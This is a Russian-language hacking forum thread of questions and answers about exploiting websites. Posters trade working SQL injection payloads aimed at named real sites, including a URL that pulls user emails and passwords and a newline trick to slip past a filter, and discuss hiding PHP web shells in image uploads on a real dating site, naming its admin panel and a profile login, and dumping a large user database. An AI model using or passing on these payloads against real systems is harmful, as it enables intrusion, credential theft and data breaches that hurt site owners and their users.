Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. xarko_v

    xarko_v Banned

    Joined:
    18 Jan 2011
    Messages:
    10
    Likes Received:
    1
    Reputations:
    0
    http://www.exploit-db.com/exploits/15827/
     
  2. noviyuser

    noviyuser Member

    Joined:
    18 Nov 2010
    Messages:
    645
    Likes Received:
    18
    Reputations:
    6
    Netcat CMS
    -1+union+select+1,user_id+from+User+--+ показывает
    -1+union+select+1,unhex(hex(password))+from+User+--+ показывает
    -1+union+select+1,password+from+User+--+ показывает

    -1+union+select+1,login+from+User+--+ НЕ показывает
    -1+union+select+1,unhex(hex(login))+from+User+--+ НЕ показывает
    -1+union+select+1,aes_decrypt(aes_encrypt(login))+from+User+--+ НЕ показывает

    Ни Email, Login, ForumName, FullName не хочет показывать как можно это обойти?
     
  3. shell_c0de

    shell_c0de Hack All World

    Joined:
    7 Jul 2009
    Messages:
    1,180
    Likes Received:
    617
    Reputations:
    690
    2noviyuser
    пробуй захексить
    login=0x6c6f67696e
     
    _________________________
    1 person likes this.
  4. noviyuser

    noviyuser Member

    Joined:
    18 Nov 2010
    Messages:
    645
    Likes Received:
    18
    Reputations:
    6
    не хочет показывает только login, не подошел
    можент надо конвертировать str в int? есть ли такая функция
     
  5. ivitalii

    ivitalii New Member

    Joined:
    16 Jan 2011
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    Code:
    On /index.php?name=1%00%27&file=faq&p=3098
    While executing query "SELECT mid, title, custom_title, active, view, blocks, version FROM cms_modules WHERE LOWER(title)='1�''"
    
    the following error occured: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1' at line 1
    
    In: /home/anonimka/public_html/index.php on line: 73
    Что за ошибка ? можно как-нибудь раскрутить ?
     
  6. h00lyshit!

    h00lyshit! [From Nobody To Root]

    Joined:
    10 Sep 2009
    Messages:
    289
    Likes Received:
    290
    Reputations:
    195
    Ошибка синтаксиса MySQL. По всей видимости, можно.
    Как раскрутить, написано здесь http://forum.antichat.ru/thread43966.html
    П.С. Зачем там нуллбайт?
     
  7. xarko_v

    xarko_v Banned

    Joined:
    18 Jan 2011
    Messages:
    10
    Likes Received:
    1
    Reputations:
    0
    +union+select+1,cast(version()+as+binary),3,4,5,6
    or
    +union+select+1,convert(version()+using+latin1),3,4,5,6
    or
    /*!...*/
     
    1 person likes this.
  8. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    помогите разобратся, невогу вывести информацию из табле схема, постоянно пишет ошибку

    http://nicedave.com/content.php?id=6659+union+select+1,2,3
     
  9. TreV@N

    TreV@N Elder - Старейшина

    Joined:
    14 Jul 2008
    Messages:
    135
    Likes Received:
    48
    Reputations:
    19
    Доступ к information_schema закрыт.Ручками перебирай таблицы.Там есть таблица "users" :)
     
  10. j-prof

    j-prof Banned

    Joined:
    29 Aug 2010
    Messages:
    321
    Likes Received:
    11
    Reputations:
    -4
    privateurl.com
    в поле логин
    хз как там раскрутить помогите и вообще кривая какаят +--+ не робит а /* робит чо эт знач помогите
    кста через union можно ток select выполнять или апдэйт, delete, insert тож
     
  11. DCrypt

    DCrypt Banned

    Joined:
    21 Jan 2010
    Messages:
    367
    Likes Received:
    35
    Reputations:
    1
    Так работает:

    Code:
    http://www.fumasano.es/b2c/index.php?page=pp_productos.php&tipo=1&codf=-1+UNION+SELECT+1,2,3,4,5--
    А так нет:
    Code:
    http://www.fumasano.es/b2c/index.php?page=pp_productos.php&tipo=1&codf=-1+UNION+SELECT+1,2,3,4,concat_ws(0x3a,codigousuario,email,password)+from+ph_usuarios--
    Почему? =\
     
    #15971 DCrypt, 28 Jan 2011
    Last edited: 28 Jan 2011
  12. TreV@N

    TreV@N Elder - Старейшина

    Joined:
    14 Jul 2008
    Messages:
    135
    Likes Received:
    48
    Reputations:
    19
    Кажется там from фильтруется.
     
  13. DCrypt

    DCrypt Banned

    Joined:
    21 Jan 2010
    Messages:
    367
    Likes Received:
    35
    Reputations:
    1
    http://www.exploit-db.com/exploits/16060/
    Где?
     
  14. freezed

    freezed Member

    Joined:
    27 Aug 2010
    Messages:
    154
    Likes Received:
    22
    Reputations:
    7
    а при чем тут сама уязвимость, фильтруется на хосте, только не from, а select from, обходится так:
    Code:
    http://www.fumasano.es/b2c/index.php?page=pp_productos.php&tipo=1&codf=-1+UNION+SELECT%0a1,2,3,4,concat_ws(0x3a,codigousuario,email,password)+from+ph_usuarios--
     
    3 people like this.
  15. noviyuser

    noviyuser Member

    Joined:
    18 Nov 2010
    Messages:
    645
    Likes Received:
    18
    Reputations:
    6
    подскажите софт или скрипт для быстрого блайнда? а то приходится долго ждать пока идет перебор
     
  16. KandidaT'S

    KandidaT'S New Member

    Joined:
    9 Jul 2010
    Messages:
    58
    Likes Received:
    3
    Reputations:
    0
    поломал сайтец пришло время заливать шелл на стандартные вещи типо sheel.php.gif не помогают, помогите как бы! Внизу админки был найден корпарайт -> Copyright © 2006 Content-manager
     
  17. rootmd

    rootmd New Member

    Joined:
    9 Dec 2010
    Messages:
    101
    Likes Received:
    3
    Reputations:
    -5
    uname -a: Windows NT WINCTRL-7IBNPUN 6.1 build 7600 ((null)) i586

    Safe-mode: ON (secure)

    C:\ drwxrwxrwx

    (это пхп шелл)

    Можно как-то запускать радмин или что-то?
     
  18. fl00der

    fl00der Moderator

    Joined:
    17 Dec 2008
    Messages:
    1,027
    Likes Received:
    311
    Reputations:
    86
    Нереал так подсказать.
    В админке есть залив файлов?
    Тулза от Пашкелы вроде умеет.
     
    _________________________
    1 person likes this.
  19. KandidaT'S

    KandidaT'S New Member

    Joined:
    9 Jul 2010
    Messages:
    58
    Likes Received:
    3
    Reputations:
    0
    заливка фаилов есть я так понел картинки и pdf заливаю sheel.php.pdf пишет неправильное название
     
  20. Dagger

    Dagger New Member

    Joined:
    7 Oct 2010
    Messages:
    0
    Likes Received:
    1
    Reputations:
    0
    Вопрос простой-заливаю шелл в картинку при помощи Notepad, затем ставлю её в датинге как основное фото(админом не спалилось) .Далее копирую урл картинки и шелл нифига не открывается- почему? Заливаю как shell.php.jpg. Shell.jpg.php не прокатывает. Может какой другой прогой шелл в картинку вливать? Если делать просто шелл без изображения т.е. просто конвертировать название шелла- то вообще не прокатывает.
    http://okfreedating.net/static/i/1/10/A8/t_u594088_399_shell.php.jpg либо так http://okfreedating.net/photo.php?user_id=594088&album_id=1&current=0 , а шелл не открывается-(((
    И ещё. Зная на взломанном сайте таблицы,номера колонок и т.д.,т.е. полный путь до нужной базы,но опять же без админки, чем сдампить эту базу? Пытался сдампить Havij 1.14, но слишком долго-база миллионник-)
    ICQ 620198086

    http://admin.okfreedating.net/login.php- админка
    профиль где залит шелл: vlamalijj@Fdfnfh
    И ещё- как получить пароль админа? Просьба не пинать-) Учусь
     
    #15980 Dagger, 29 Jan 2011
    Last edited: 29 Jan 2011
Thread Status:
Not open for further replies.